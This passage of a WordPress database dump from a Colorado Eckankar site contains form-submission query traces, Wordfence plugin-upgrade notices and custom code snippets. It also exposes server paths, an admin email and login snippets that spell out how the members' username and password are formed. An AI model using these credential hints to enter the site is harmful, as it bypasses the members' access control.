"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(137,69,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (163130, \'_field_306\', \'Your location\')',NULL,NULL),(138,69,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(139,70,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 163130',NULL,NULL),(140,70,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(141,71,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (163130, \'_field_307\', \'Where is the Colorado Eck Temple?\')',NULL,NULL),(142,71,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL);
/*!40000 ALTER TABLE `wpcl_nf3_object_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_object_meta` with 142 row(s)
--

--
-- Table structure for table `wpcl_wfissues`
--

DROP TABLE IF EXISTS `wpcl_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM AUTO_INCREMENT=6463 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfissues`
--

LOCK TABLES `wpcl_wfissues` WRITE;
/*!40000 ALTER TABLE `wpcl_wfissues` DISABLE KEYS */;
INSERT INTO `wpcl_wfissues` VALUES (6460,1700583187,1700583187,'new','wfPluginUpgrade',50,'a117af3b20cb198bd818b912bf1940a4','a117af3b20cb198bd818b912bf1940a4','The Plugin \"Modula\" needs an upgrade (2.7.8 -> 2.7.9).','You need to upgrade \"Modula\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:6:\"Modula\";s:9:\"PluginURI\";s:22:\"https://wp-modula.com/\";s:7:\"Version\";s:5:\"2.7.8\";s:11:\"Description\";s:123:\"Modula is the most powerful, user-friendly WordPress gallery plugin. Add galleries, masonry grids and more in a few clicks.\";s:6:\"Author\";s:7:\"WPChill\";s:9:\"AuthorURI\";s:24:\"https://www.wpchill.com/\";s:10:\"TextDomain\";s:24:\"modula-best-grid-gallery\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:3:\"5.6\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:6:\"Modula\";s:10:\"AuthorName\";s:7:\"WPChill\";s:10:\"pluginFile\";s:80:\"/home/eckank5/public_html/wp-content/plugins/modula-best-grid-gallery/Modula.php\";s:4:\"slug\";s:24:\"modula-best-grid-gallery\";s:10:\"newVersion\";s:5:\"2.7.9\";s:5:\"wpURL\";s:54:\"https://wordpress.org/plugins/modula-best-grid-gallery\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(6452,1700415084,1700415084,'new','skippedPaths',25,'6fd0d290b978eab8027e6b79501ac149','6fd0d290b978eab8027e6b79501ac149','2 paths were skipped for the malware scan due to scan settings','The option \"Scan files outside your WordPress installation\" is off by default, which means 2 paths and their file(s) will not be scanned for malware or unauthorized changes. To continue skipping these paths, you may ignore this issue. Or to start scanning them, enable the option and subsequent scans will include them. Some paths may not be necessary to scan, so this is optional. <a href=\"https://www.wordfence.com/help/?query=scan-result-skipped-paths\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a><br><br>The paths skipped are /home/eckank5/public_html/staging and /home/eckank5/public_html/wordpress','a:0:{}'),(6461,1700583187,1700583187,'new','wfPluginUpgrade',50,'1931fe37c28f4076900727d8db1263ec','1931fe37c28f4076900727d8db1263ec','The Plugin \"Redis Object Cache\" needs an upgrade (2.4.4 -> 2.5.0).','You need to upgrade \"Redis Object Cache\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:18:\"Redis Object Cache\";s:9:\"PluginURI\";s:42:\"https://wordpress.org/plugins/redis-cache/\";s:7:\"Version\";s:5:\"2.4.4\";s:11:\"Description\";s:132:\"A persistent object cache backend powered by Redis. Supports Predis, PhpRedis, Relay, replication, sentinels, clustering and WP-CLI.\";s:6:\"Author\";s:11:\"Till Krüss\";s:9:\"AuthorURI\";s:23:\"https://objectcache.pro\";s:10:\"TextDomain\";s:11:\"redis-cache\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:3:\"7.2\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:18:\"Redis Object Cache\";s:10:\"AuthorName\";s:11:\"Till Krüss\";s:10:\"pluginFile\";s:72:\"/home/eckank5/public_html/wp-content/plugins/redis-cache/redis-cache.php\";s:4:\"slug\";s:11:\"redis-cache\";s:10:\"newVersion\";s:5:\"2.5.0\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/redis-cache\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(6462,1700583187,1700583187,'new','wfPluginUpgrade',50,'8bc4a6f29f343ae3d9e1c5c9dfa07e12','8bc4a6f29f343ae3d9e1c5c9dfa07e12','The Plugin \"WP STAGING - Backup Duplicator & Migration\" needs an upgrade (3.1.2 -> 3.1.3).','You need to upgrade \"WP STAGING - Backup Duplicator & Migration\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:42:\"WP STAGING - Backup Duplicator & Migration\";s:9:\"PluginURI\";s:40:\"https://wordpress.org/plugins/wp-staging\";s:7:\"Version\";s:5:\"3.1.2\";s:11:\"Description\";s:14:\"Backup Restore\";s:6:\"Author\";s:27:\"WP-STAGING, WPStagingBackup\";s:9:\"AuthorURI\";s:39:\"https://wp-staging.com/backup-wordpress\";s:10:\"TextDomain\";s:10:\"wp-staging\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:4:\"3.6+\";s:11:\"RequiresPHP\";s:3:\"7.0\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:42:\"WP STAGING - Backup Duplicator & Migration\";s:10:\"AuthorName\";s:27:\"WP-STAGING, WPStagingBackup\";s:10:\"pluginFile\";s:70:\"/home/eckank5/public_html/wp-content/plugins/wp-staging/wp-staging.php\";s:4:\"slug\";s:10:\"wp-staging\";s:10:\"newVersion\";s:5:\"3.1.3\";s:5:\"wpURL\";s:40:\"https://wordpress.org/plugins/wp-staging\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(6459,1700583187,1700583187,'new','wfPluginUpgrade',50,'e4ed458bf1a52d18da581cfbdc414cac','e4ed458bf1a52d18da581cfbdc414cac','The Plugin \"Advanced Google reCAPTCHA\" needs an upgrade (1.12 -> 1.14).','You need to upgrade \"Advanced Google reCAPTCHA\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:25:\"Advanced Google reCAPTCHA\";s:9:\"PluginURI\";s:25:\"https://getwpcaptcha.com/\";s:7:\"Version\";s:4:\"1.12\";s:11:\"Description\";s:213:\"Advanced Google reCAPTCHA will safeguard your WordPress site from spam comments and brute force attacks. With this plugin, you can easily add Google reCAPTCHA to WordPress comment form, login form and other forms.\";s:6:\"Author\";s:14:\"WebFactory Ltd\";s:9:\"AuthorURI\";s:30:\"https://www.webfactoryltd.com/\";s:10:\"TextDomain\";s:25:\"advanced-google-recaptcha\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.0\";s:11:\"RequiresPHP\";s:3:\"5.2\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:25:\"Advanced Google reCAPTCHA\";s:10:\"AuthorName\";s:14:\"WebFactory Ltd\";s:10:\"pluginFile\";s:100:\"/home/eckank5/public_html/wp-content/plugins/advanced-google-recaptcha/advanced-google-recaptcha.php\";s:4:\"slug\";s:25:\"advanced-google-recaptcha\";s:10:\"newVersion\";s:4:\"1.14\";s:5:\"wpURL\";s:55:\"https://wordpress.org/plugins/advanced-google-recaptcha\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wpcl_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfissues` with 5 row(s)
--

--
-- Table structure for table `wpcl_snippets`
--

DROP TABLE IF EXISTS `wpcl_snippets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_snippets` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` tinytext NOT NULL,
  `description` text NOT NULL,
  `code` longtext NOT NULL,
  `tags` longtext NOT NULL,
  `scope` varchar(15) NOT NULL DEFAULT 'global',
  `priority` smallint(6) NOT NULL DEFAULT 10,
  `active` tinyint(1) NOT NULL DEFAULT 0,
  `modified` datetime NOT NULL DEFAULT current_timestamp(),
  `revision` bigint(20) NOT NULL DEFAULT 1,
  `cloud_id` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `scope` (`scope`),
  KEY `active` (`active`)
) ENGINE=MyISAM AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_snippets`
--

LOCK TABLES `wpcl_snippets` WRITE;
/*!40000 ALTER TABLE `wpcl_snippets` DISABLE KEYS */;
INSERT INTO `wpcl_snippets` VALUES (1,'Example HTML shortcode','This is an example snippet for demonstrating how to add an HTML shortcode. You can remove it, or edit it to add your own content.','\nadd_shortcode( \'shortcode_name\', function () {\n\n	$out = \'<p>write your HTML shortcode content here</p>\';\n\n	return $out;\n} );','shortcode','global',10,0,'0000-00-00 00:00:00',1,NULL),(2,'Example CSS snippet','This is an example snippet for demonstrating how to add custom CSS code to your website. You can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n	<style>\n\n		/* write your CSS code here */\n\n	</style>\n<?php } );\n','css','front-end',10,0,'0000-00-00 00:00:00',1,NULL),(3,'Example JavaScript snippet','This is an example snippet for demonstrating how to add custom JavaScript code to your website. You can remove it, or edit it to add your own content.','\nadd_action( \'wp_head\', function () { ?>\n	<script>\n\n		/* write your JavaScript code here */\n\n	</script>\n<?php } );\n','javascript','front-end',10,0,'0000-00-00 00:00:00',1,NULL),(4,'Order snippets by name','Order snippets by name by default in the snippets table. You can remove it, or edit it to add your own content.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'name\';\n} );\n','code-snippets-plugin','admin',10,0,'0000-00-00 00:00:00',1,NULL),(5,'Login Page Text for Login Form','LOGIN PAGE TEXT FOR LOGIN FORM','function ec_custom_login_message() {\r\n$message = \'<p class=\"message\"><span style=\"font-size:18px; color:#23507d; text-align:center; margin-bottom:15px\"><strong>Member Login </strong></span></p>\r\n<p><span style=\"font-size:16px;margin-bottom:16px\"><strong>User name:  </strong>Date of the latest issue of the Mystic World (example: march2019).</p>\r\n<p><span style=\"font-size:16px;margin-bottom:16px\"><strong>Password</strong>: Last word in the title of Sri Harold\\\'s lead article in same issue.</p><br>\r\n<p><span style=\"font-size:16px; color:#23507d; text-align:center; margin-bottom:15px\"><strong><em>Type in all lowercase letters with no spaces. </em></strong></p>\r\n<p><span style=\"font-size:16px; color:#23507d; text-align:center; margin-bottom:15px\"><strong><em>Enter User &amp; Pass - click  the \"Robot\" box.</em></strong></p>\';\r\nreturn $message;\r\n}\r\nadd_filter(\'login_message\', \'ec_custom_login_message\');\r\n','','front-end',10,0,'0000-00-00 00:00:00',1,NULL),(7,'Remove Wordpress logo in Login','Remove wordpress logo in login','add_action( \'login_head\', \'hide_login_nav\' );\r\n\r\nfunction hide_login_nav()\r\n{\r\n    ?><style>#nav,#backtoblog{display:none}</style><?php\r\n}','','front-end',10,1,'0000-00-00 00:00:00',1,NULL),(10,'Hide Admin Tool Bar On Frontend','','add_action(\'after_setup_theme\', \'remove_admin_bar\');\r\n \r\nfunction remove_admin_bar() {\r\nif (!current_user_can(\'administrator\') && !is_admin()) {\r\n  show_admin_bar(false);\r\n}\r\n}','','front-end',10,1,'0000-00-00 00:00:00',1,NULL),(16,'login logout php','','//* Add a Login/Logout toggle item in WordPress navigation menu\r\nadd_filter(\'wp_nav_menu_items\', \'customprefix_add_loginout_navitem\', 10, 2);\r\nfunction customprefix_add_loginout_navitem($items, $args) {\r\n    if ($args->theme_location == \'primary\') {\r\n        // Replace \"primary\" with your theme\'s menu name\r\n        if (!(is_user_logged_in())) {\r\n            $login_item = \'<li class=\"menu-item login-menu-item\"><a itemprop=\"url\" href=\"/wp-login.php\" rel=\"nofollow\">Log in</a></li>\';\r\n        } else {\r\n            $login_item = \'<li class=\"menu-item logout-menu-item\">\' . wp_loginout($_SERVER[\'REQUEST_URI\'], false) . \'</li>\';\r\n        }\r\n        $items.= $login_item;\r\n    }\r\n    return $items;\r\n}','','front-end',10,0,'0000-00-00 00:00:00',1,NULL),(19,'Move Javascript To Bottom -- 2 --Speedrak','','// Custom Scripting to Move JavaScript from the Head to the Footer\r\n\r\nfunction remove_head_scripts() {\r\nremove_action(‘wp_head’, ‘wp_print_scripts’);\r\nremove_action(‘wp_head’, ‘wp_print_head_scripts’, 9);\r\nremove_action(‘wp_head’, ‘wp_enqueue_scripts’, 1);\r\n\r\nadd_action(‘wp_footer’, ‘wp_print_scripts’, 5);\r\nadd_action(‘wp_footer’, ‘wp_enqueue_scripts’, 5);\r\nadd_action(‘wp_footer’, ‘wp_print_head_scripts’, 5);\r\n}\r\nadd_action( ‘wp_enqueue_scripts’, ‘remove_head_scripts’ );\r\n\r\n// END Custom Scripting to Move JavaScript','','front-end',10,0,'0000-00-00 00:00:00',1,NULL),(23,'Order snippets by date','Order snippets by last modification date by default in the snippets table.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'modified\';\n} );\n\nadd_filter( \'code_snippets/list_table/default_order\', function () {\n	return \'desc\';\n} );\n','code-snippets-plugin','admin',10,0,'2020-01-26 16:12:36',1,NULL),(24,'Order snippets by date','Order snippets by last modification date by default in the snippets table.','\nadd_filter( \'code_snippets/list_table/default_orderby\', function () {\n	return \'modified\';\n} );\n\nadd_filter( \'code_snippets/list_table/default_order\', function () {\n	return \'desc\';\n} );\n','code-snippets-plugin','admin',10,0,'2020-01-26 16:12:36',1,NULL),(32,'Change Password Protected Message','PASSWORD PROTECTED MESSAGE PHP/HTML - MUST BE USED IN CONJUNCTION WITH THE FOLLOWING EXTERNAL CSS -- THIS IS ALREADY IN PLACE IN \'APPEARANCE/CUSTOM CSS\'\r\n\r\n.post-password-required form input { margin: 0 auto 10px auto;}\r\n\r\n.post-password-form {\r\nmin-height: initial;\r\npadding: 30px !important;\r\nmax-width: 640px;\r\nmargin: auto;\r\npadding-bottom: 0px;\r\nborder-radius: 10px;\r\nmargin-top: 108px;\r\nmargin-bottom: 65px;\r\n}\r\n\r\n.passwordmessage {\r\nbackground-color: #EBEBEB !important;\r\n}','function my_custom_password_form() {\r\n		global $post;\r\n		$label = \'pwbox-\' . ( empty( $post->ID ) ? rand() : $post->ID );\r\n		$output = \'\r\n		<div class=\"boldgrid-section\">\r\n			<div class=\"container\">\r\n				<form action=\"\' . esc_url( site_url( \'wp-login.php?action=postpass\', \'login_post\' ) ) . \'\" class=\"form-inline post-password-form passwordmessage\" method=\"post\">\r\n					<p style=\"font-size: 24px; color: #41527b; text-align: left; margin-top: 15px;\">\' . __( \'This Area Requires A Member Password.</p>\r\n<p class=\"passwordmessage\" style=\"font-size: 18px; text-align: left; margin-bottom: 15px;\">Please enter the last word in the title of Sri Harold’s lead article in the current issue of the Mystic World. (In lowercase letters).</p>\' ) . \'</p>\r\n					<label for=\"\' . $label . \'\">\' . __( \'Password:\' ) . \' <input name=\"post_password\" id=\"\' . $label . \'\" type=\"password\" size=\"20\" class=\"form-control\" /></label><button type=\"submit\" name=\"Submit\" class=\"button-primary\">\' . esc_attr_x( \'Submit\', \'post password form\' ) . \'</button>\r\n				</form>\r\n			</div>\r\n		</div>\';\r\n	return $output;\r\n}\r\nadd_filter(\'the_password_form\', \'my_custom_password_form\', 99);\r\n\r\n\r\n','','global',10,1,'2022-08-15 17:35:39',1,NULL),(33,'Login Page-Logo Change- Added by Chris - 7-31-22','','function my_login_logo_one() { \r\n?> \r\n<style type=\"text/css\"> \r\nbody.login div#login h1 a {\r\n background-image: url(https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png) !important;\r\n padding-bottom: 30px;\r\n background-size: 66px 65px;\r\n background-repeat: no-repeat;\r\n width: 66px;\r\n height: 65px;\r\nmargin-bottom: -8px;\r\n} \r\n</style>\r\n <?php \r\n} add_action( \'login_enqueue_scripts\', \'my_login_logo_one\' );\r\n','','front-end',10,1,'2022-09-06 07:59:01',1,NULL),(34,'Login Background Image - Added by Chris-8-2-2022','','function wphelp_my_login_background() {\necho \'<style type=\"text/css\">\nbody.login{\nbackground-image: url( \"https://eckankar-colorado.org/wp-content/uploads/2023/07/login-bk-8.jpg\" )!important;}\n</style>\';\n}\nadd_action(\'login_head\', \'wphelp_my_login_background\');','','front-end',10,1,'2023-07-26 03:09:20',1,NULL),(35,'Login Logo Redirect - Added by Chris 7-31-2022','','// Custom login logo url\r\nfunction my_login_logo_url() {\r\nreturn get_bloginfo( \'url\' );\r\n}\r\nadd_filter( \'login_headerurl\', \'my_login_logo_url\' );\r\n\r\nfunction my_login_logo_url_title() {\r\nreturn \'https://eckankar-colorado.org\';\r\n}\r\nadd_filter( \'login_headertitle\', \'my_login_logo_url_title\' );\r\n// END custom login logo url','','global',10,1,'2022-08-02 20:47:03',1,NULL),(39,'Change WordPress Sender Name and Address in Email Notifications','<p>Change WordPress Sender Name and Address in Email Notifications</p>','/** Change Default WordPress Username on Emails */\nadd_filter(\'wp_mail_from\', \'new_mail_from\');\nadd_filter(\'wp_mail_from_name\', \'new_mail_from_name\');\nfunction new_mail_from($old) {\nreturn \'webmaster@eckankar-colorado.org\';\n}\nfunction new_mail_from_name($old) {\nreturn \'Eckankar In Colorado\';\n}','','global',10,1,'2023-08-02 16:31:07',1,NULL);
/*!40000 ALTER TABLE `wpcl_snippets` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_snippets` with 16 row(s)
--

--
-- Table structure for table `wpcl_comments`
--

DROP TABLE IF EXISTS `wpcl_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_comments` (
